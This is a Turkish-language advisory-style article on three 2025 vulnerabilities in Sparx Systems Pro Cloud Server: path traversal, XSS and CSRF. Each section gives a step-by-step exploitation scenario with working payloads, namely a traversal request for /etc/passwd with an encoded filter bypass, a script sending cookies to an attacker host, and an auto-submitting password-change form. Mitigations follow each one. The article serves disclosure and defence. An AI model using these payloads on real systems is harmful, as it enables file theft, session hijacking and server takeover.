Sparx Systems Pro Cloud Server'da Kritik Güvenlik Açıkları
Giriş
Sparx Systems Pro Cloud Server, kuruluşların karmaşık sistem mimarilerini yönetmek için kullandığı işbirlikçi bir modelleme platformudur. Finlandiya Ulusal Siber Güvenlik Merkezi tarafından bu yazılımı kullanan kuruluşların güvenliğini tehlikeye atabilecek üç kritik güvenlik açığı açıklandı. Bu makale, her bir güvenlik açığının detaylı analizini ve gerçekçi sömürü senaryolarını içermektedir.
1. CVE-2025-4377: logview.php'de Yol Geçişi (Path Traversal) Açığı
Teknik Analiz:
Bu güvenlik açığı, Pro Cloud Server'ın Yapılandırma arayüzündeki logview.php bileşeninde bulunmaktadır. Dosya yolu referanslarının uygun şekilde sınırlandırılmaması (klasik bir yol geçişi hatası) nedeniyle, saldırganlar dosya yolu parametrelerini manipüle ederek dosya sistemindeki rastgele dosyaları okuyabilir.
Etkilenen Sürümler: Yama içeren sürüm öncesi tüm versiyonlar (6.0.165 sürümünde düzeltildiği belirtiliyor)
Sömürü Senaryosu
Adım 1: Zafiyetli uç noktanın tespiti Saldırgan, Pro Cloud Server'ın yapılandırma arayüzünün şu adreste açık olduğunu keşfeder:
https://hedef-sirket.com/ProCloudServer/config/logview.phpAdım 2: Kötü niyetli isteğin oluşturulması Saldırgan, dizin geçiş dizileri içeren bir GET isteği gönderir:
GET /ProCloudServer/config/logview.php?file=../../../../../../etc/passwd HTTP/1.1
Host: hedef-sirket.comAdım 3: Olası savunmaların atlatılması Temel filtreler varsa, saldırgan kodlama kullanabilir:
GET /ProCloudServer/config/logview.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1Etki:
- Hassas sistem dosyalarının ifşası (passwd, shadow vb.)
- Kimlik bilgileri içeren uygulama yapılandırma dosyalarına erişim
- Tescilli bilgiler içeren EA model dosyalarına potansiyel erişim
Önlemler:
- En güncel yamalı sürüme yükseltme
- Dosya parametreleri için katı girdi doğrulama uygulama
- Web sunucu işlemine en az ayrıcalık ilkesi uygulama
2. CVE-2025-4376: WebEA Model Arama Alanında Siteler Arası Komut Dosyası Çalıştırma (XSS)
Teknik Analiz: WebEA bileşeninin model arama işlevselliği, kullanıcı girdisini uygun şekilde temizlemez ve depolanmış XSS saldırılarına izin verir. Bu özellikle tehlikelidir çünkü WebEA işbirlikçi çalışma için tasarlanmıştır, yani kötü niyetli komut dosyaları birden çok kimliği doğrulanmış kullanıcının bağlamında çalıştırılabilir.
Etkilenen Sürümler: 6.0.165 öncesi tüm sürümler
Sömürü Senaryosu
Adım 1: Zafiyetli arama alanının tespiti Saldırgan, WebEA'daki arama terimlerinin uygun çıktı kodlaması olmadan yansıtıldığını keşfeder:
https://hedef-sirket.com/WebEA/models/search?term=TESTAdım 2: Kötü niyetli yükün oluşturulması Saldırgan, aranabilir alanlarda JavaScript içeren özel olarak hazırlanmış bir EA modeli oluşturur:
<script>
fetch('https://saldirgan.com/cal?cookie='+document.cookie);
</script>Veya yansıtılan XSS için:
https://hedef-sirket.com/WebEA/models/search?term=<script>alert(document.domain)</script>Adım 3: Sosyal mühendislik Saldırgan, ayrıcalıklı bir kullanıcıyı özel olarak hazırlanmış bağlantıya veya modele erişmeye ikna eder:
- Hazırlanmış bağlantı içeren kimlik avı e-postası
- Paylaşılan modellerde kötü niyetli arama terimine referans veren yorumlar
Etki:
- Kimliği doğrulanmış kullanıcıların oturumlarının ele geçirilmesi
- Mağdurun ayrıcalıklarıyla yetkisiz işlemler yapılması
- Yönetici kullanıcılar hedeflenirse Pro Cloud Server'ın tamamen ele geçirilme potansiyeli
Önlemler:
- Tüm kullanıcı kontrolündeki veriler için uygun çıktı kodlaması uygulama
- İçerik Güvenlik Politikası başlıkları ekleme
- Yamalı sürüme yükseltme
3. CVE-2025-4375: Yapılandırma Şifresi Değişimine İzin Veren Siteler Arası İstek Sahteciliği (CSRF)
Teknik Analiz: Tüm Pro Cloud Server uygulamasında uygun CSRF korumaları bulunmamaktadır, ancak en kritik tezahürü saldırganların sunucunun yapılandırma şifresini değiştirmesine izin vermesidir. Bu, saldırganlara Pro Cloud Server yapılandırması üzerinde yönetici kontrolü sağlar.
Etkilenen Sürümler: 6.0.165 öncesi tüm sürümler
Sömürü Senaryosu
Adım 1: Şifre değiştirme uç noktasının tespiti Saldırgan uygulamayı analiz eder ve şifre değiştirme işlevini şu adreste bulur:
POST /ProCloudServer/config/changepassword HTTP/1.1
Host: hedef-sirket.com
Content-Type: application/x-www-form-urlencoded
newpass=YENISIFRE&confirm=YENISIFREAdım 2: Kötü niyetli sayfanın oluşturulması Saldırgan şu içeriği barındıran bir sayfa hazırlar:
<html>
<body>
<form action="https://hedef-sirket.com/ProCloudServer/config/changepassword" method="POST">
<input type="hidden" name="newpass" value="sifre123" />
<input type="hidden" name="confirm" value="sifre123" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>Adım 3: Kurbanın tuzağa düşürülmesi Kimliği doğrulanmış bir yönetici, Pro Cloud Server'a giriş yapmış haldeyken saldırganın sayfasını ziyaret eder. Form otomatik olarak gönderilir ve şifre "sifre123" olarak değiştirilir.
Etki:
- Pro Cloud Server yapılandırmasının tamamen ele geçirilmesi
- Sunucu ayarlarını, erişim belirteçlerini ve bağlantı dizelerini değiştirme yetkisi
- Saklanan kimlik bilgileri aracılığıyla dahili sistemlere geçiş potansiyeli
Önlemler:
- Tüm durum değiştiren işlemler için CSRF belirteçleri uygulama
- Hassas eylemler için yeniden kimlik doğrulama gerektirme
- Yamalı sürüme yükseltme
Kapsamlı Savunma Stratejisi
Acil Eylemler:
- Pro Cloud Server'ı 6.0.165 veya sonraki bir sürüme yükseltme
- Sömürü belirtileri için günlükleri denetleme
- Pro Cloud Server'da saklanan veya kullanılan tüm kimlik bilgilerini değiştirme
Ağ Kontrolleri:
- Yapılandırma arayüzüne erişimi belirli IP aralıklarıyla kısıtlama
- Yol geçişi ve XSS girişimlerini tespit etmek için WAF kuralları uygulama
Uzun Vadeli Önlemler:
- EA ortamlarında düzenli güvenlik değerlendirmeleri yapma
- Olağandışı dosya erişim desenleri için izleme uygulama
- Kullanıcıları kimlik avı girişimlerini tanıma konusunda eğitme
Sonuç
Bu güvenlik açıkları toplu olarak, Sparx Systems Pro Cloud Server'ın savunmasız sürümlerini kullanan kuruluşlar için kritik bir risk oluşturmaktadır. Yol geçişi, XSS ve CSRF'nin kombinasyonu, saldırganların uygulamayı tamamen ele geçirmesine ve potansiyel olarak ortamdaki diğer sistemlere geçiş yapmasına olanak tanıyabilir. Etkilenen tüm kuruluşların acilen yama uygulaması ve kapsamlı güvenlik incelemeleri yapması şiddetle tavsiye edilir.